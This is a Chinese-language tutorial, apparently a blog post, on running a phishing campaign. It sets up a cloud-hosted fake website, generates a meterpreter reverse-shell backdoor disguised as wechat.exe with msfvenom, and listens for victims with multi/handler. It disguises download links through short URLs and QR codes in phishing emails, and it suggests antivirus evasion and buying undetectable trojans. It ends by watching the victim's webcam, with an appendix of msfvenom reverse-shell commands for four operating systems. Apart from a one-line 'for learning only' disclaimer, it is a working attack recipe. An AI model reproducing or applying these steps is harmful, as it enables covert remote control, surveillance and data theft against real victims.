声明:内容仅供学习,请勿违法使用,违者后果自负

一.部署云服务器

购买一台华为云服务器,Windows( 中文 )版本即可
华为云官网:https://www.huaweicloud.com/
登录后进入控制台

购买完成后远程登录云服务器

二.部署WEB运行环境

1.windows云服务器上下载并安装phpstudy
2.安装完之后选择:WAMP 环境,进行开启
phpstudy下载:

解压后运行phpstudy
切换到WAMP


  通过华为云服务器公网IP地址进行访问:
  在任意能够联网的设备浏览器中输入:
  http://华为云公网IP
  
  例子:
  http://124.70.93.88/

三.上传钓鱼网站代码文件,钓鱼网站伪装


代码文件下载,下载完成后上传到云服务器:C:\phpstudy_pro\WWW目录下,通过访问云服务器IP地址的
方式即可访问到网站页面

修改phpstudy配置,设置默认首页为index.html(删除index.php)



在线生成二维码:https://www.hlcode.cn/url
将公网IP放进去,转换成二维码

四.生成meterpreter后门

网站上可以放置后门程序,用户在访问时直接会进行下载,如果是Kali Linux服务器上可以使用msfvenomMSF工具生成并监听,Windows可以下载以下软件(运行在Windows下的MSF):

安装后进入到bin目录:

下载后安装在windows云服务器中,进入到MSF bin目录下:
cmd中输入:

cd C:\metasploit-framework\bin

 msfvenom -p windows/meterpreter/reverse_tcp lhost=自己华为云服务器的公网IP lport=
4444 -f exe -o wechat.exe 


将wechat.exe上传到云服务器web网站根目录中
用户访问 http://华为云IP/wechat.exe 即可下载后门程序(注意,用户主机需要关掉杀毒
软件与自带的病毒防御)


在华为云服务器中监听后门上线:
运行C:\metasploit-framework\bin\msfconsole.bat程序
msf6 > use exploit/multi/handler
msf6 > set payload windows/meterpreter/reverse_tcp
msf6 > set lhost 华为云公网IP
msf6 > set lport 4444
msf6 > run


生成后在华为云服务器管理界面配置安全规则 




五.邮件钓鱼,链接伪装

将上一步骤的后门程序wechat.exe上传到web网站根目录(C:\phpstudy_pro\WWW)下

用户可以通过以下链接下载后门程序:
 华为云服务器公网IP/ wechat.exe

但是如果发送此链接给到用户,会较容易被识破,所以可以重新生成新链接:
访问以下网站,生成新的链接:
在线地址转换:https://www.bejson.com/convert/shorturl/

将生成的新链接,构造成钓鱼邮件发送给用户:

一些伪装技术:
exe捆绑技术

一些免杀技术:
加壳,加花指令...
网站上使用加密货币购买能够绕过杀毒软件的木马....

六.钓鱼效果验证

在华为云服务器上进入msf
输入:use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 华为云公网IP
set lport 4444
run

开始监听,出现meterpreter > 字样代表监听成功
后续即可进行屏幕共享,屏幕截图,监控摄像头了 
监控摄像头:
meterpreter > webcam_stream   


附:Msfvenom生成不同系统后门命令

Windows:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=你的IP LPORT=你的端口 -f exe > 木马名.exe


Linux:
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=你的IP LPORT=你的端口 -f elf > 木马名


Android:
msfvenom -p android/meterpreter/reverse_tcp LHOST=你的IP LPORT=你的端口 R > 木马名.apk


MacOS:
msfvenom -p osx/x86/shell_reverse_tcp LHOST=你的IP LPORT=你的端口 -f macho > 木马名.macho